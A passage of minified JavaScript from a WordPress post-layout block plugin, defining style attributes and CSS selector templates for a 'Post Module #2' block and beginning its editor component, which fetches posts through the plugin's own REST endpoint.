{{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-item:first-child .ultp-block-title,    \n          {{ULTP}} .ultp-big-post-module2 .ultp-block-item:first-child .ultp-block-title a"}]},lgTitleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content .ultp-block-title a { color: {{lgTitleColor}} !important }"}]},lgTitleHoverColor:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content .ultp-block-title a:hover { color: {{lgTitleHoverColor}} !important }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"22",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item .ultp-block-title,   \n          {{ULTP}} .ultp-small-post-module2 .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:5,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}]}]},imgWidth:{type:"object",default:{lg:"80",sm:"65",xs:"",ulg:"px",usm:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image img {height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image img { object-fit: {{imageScale}}; }"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-image,   \n          {{ULTP}} .ultp-small-post-module2 .ultp-block-image,   \n          {{ULTP}} .ultp-block-image img,   \n          {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:before,   \n          {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:after { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image,   \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image img,   \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:before,   \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:after{ border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"20"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout2"},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module2 .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-small-post-module2  .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module2  .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},metaHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 span.ultp-block-meta-element:hover ,  \n          {{ULTP}} .ultp-block-items-wrap .ultp-small-post-module2 span.ultp-block-meta-element:hover a { color: {{metaHoverColor}}!important; }  \n          {{ULTP}} .ultp-small-post-module2 span.ultp-block-meta-element:hover svg { color: {{metaHoverColor}}; }"}]},LargeMetaColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element { color: {{LargeMetaColor}} !important; } \n          {{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element svg { color: {{LargeMetaColor}} !important; } \n          {{ULTP}} .ultp-block-items-wrap .ultp-big-post-module2 span.ultp-block-meta-element a { color: {{LargeMetaColor}} !important; }\n          {{ULTP}} .ultp-big-post-module2 .ultp-block-meta-dot span:after { background:{{LargeMetaColor}} !important; } \n          {{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element:after { color:{{LargeMetaColor}} !important; }"}]},LgMetaHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element:hover svg { color: {{LgMetaHoverColor}} !important; }  \n          {{ULTP}} .ultp-block-items-wrap .ultp-big-post-module2 span.ultp-block-meta-element a:hover { color: {{LgMetaHoverColor}} !important; }  \n          {{ULTP}} .ultp-big-post-module2 span.ultp-block-meta-element:hover { color: {{LgMetaHoverColor}} !important; }"}]},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},smallExcerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"showSmallExcerpt",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-excerpt,    \n        {{ULTP}} .ultp-small-post-module2 .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptBigColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-excerpt,                     \n        {{ULTP}} .ultp-big-post-module2 .ultp-block-excerpt p { color:{{excerptBigColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-block-excerpt,                     \n        {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,    \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,  \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,    \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout5 .ultp-small-post-module2 .ultp-block-item::before,    \n          {{ULTP}} .ultp-layout4 .ultp-small-post-module2 .ultp-block-content::before { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!1},septColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"15"},style:[{selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { padding-bottom: {{septSpace}}px; }    \n          {{ULTP}} .ultp-small-post-module2 .ultp-block-item:not(:last-child) { margin-bottom: {{septSpace}}px; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }    \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }    \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }    \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse;justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},lgInnerPadding:{type:"object",default:{lg:{top:25,bottom:25,left:25,right:25,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content  { padding: {{lgInnerPadding}}; }"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-small-post-module2 .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},columnFlip:{type:"boolean",default:!1},headingText:{type:"string",default:"Post Module #2"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,  \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; }  \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover,  \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active,  \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a,  \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advanceAttr","advFilter","heading","pagiBlockCompatibility","pagination","video","meta","category","readMore","query"],["pagiMargin"],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},72528:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(64988),n=l(16128),r=l(65994);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-module-2/","block_docs"),s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-module-2.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postmodule2.svg"}},edit:i.Z,save:()=>null})},40181:(e,t,l)=>{"use strict";l.d(t,{Z:()=>U});var o=l(67294),a=l(46066),i=l(64766),n=l(53049),r=l(23890),s=l(49491),p=l(29236),c=l(46896),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(25335),b=l(73151),v=l(69735),h=l(2963),f=l(39349),k=l(87025),w=l(92807);const{__}=wp.i18n,{InspectorControls:x,useBlockProps:T}=wp.blockEditor,{useEffect:_,useState:C,useRef:E,Fragment:S}=wp.element,{Spinner:P,Placeholder:L}=wp.components,{getBlockAttributes:I,getBlockRootClientId:B}=wp.data.select("core/block-editor");function U(e){const t=E(null),[l,U]=C(k.Ti),[M,A]=C(null),{setAttributes:H,clientId:N,className:j,name:Z,isSelected:O,attributes:R,context:D,attributes:{blockId:z,imageShow:F,imgCrop:W,readMoreIcon:V,arrowStyle:G,arrows:q,fade:$,dots:K,slideSpeed:J,autoPlay:Y,readMore:X,readMoreText:Q,excerptLimit:ee,metaStyle:te,catShow:le,metaSeparator:oe,titleShow:ae,catStyle:ie,catPosition:ne,titlePosition:re,excerptShow:se,metaList:pe,metaShow:ce,headingShow:ue,headingStyle:de,headingAlign:me,headingURL:ge,headingText:ye,headingBtnText:be,subHeadingShow:ve,subHeadingText:he,metaPosition:fe,imgOverlay:ke,imgOverlayType:we,contentVerticalPosition:xe,contentHorizontalPosition:Te,showFullExcerpt:_e,customCatColor:Ce,onlyCatColor:Ee,contentTag:Se,titleTag:Pe,showSeoMeta:Le,titleLength:Ie,metaMinText:Be,metaAuthorPrefix:Ue,titleStyle:Me,metaDateFormat:Ae,slidesToShow:He,authorLink:Ne,fallbackEnable:je,headingTag:Ze,notFoundMessage:Oe,dcEnabled:Re,dcFields:De,V4_1_0_CompCheck:{runComp:ze},advanceId:Fe,previewImg:We,currentPostId:Ve}}=e;function Ge(e){U({...l,selectedDC:e})}function qe(){U({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function $e(e){U({...l,section:{...k.ZQ,[e]:!0}}),(0,k.Rt)(e),(0,k.ob)(e),A("setting")}function Ke(e){U((t=>({...t,toolbarSettings:e}))),(0,k.os)(e)}function Je(){l.error&&U({...l,error:!1}),l.loading||U({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,n.Ld)(R)}).then((e=>{U({...l,postsList:e,loading:!1})})).catch((e=>{U({...l,loading:!1,error:!0})}))}function Ye(e,t){e.stopPropagation(),$e("arrow"),Ke("arrow"),t()}_((()=>{(0,k.oA)(),Je()}),[]),_((()=>{const 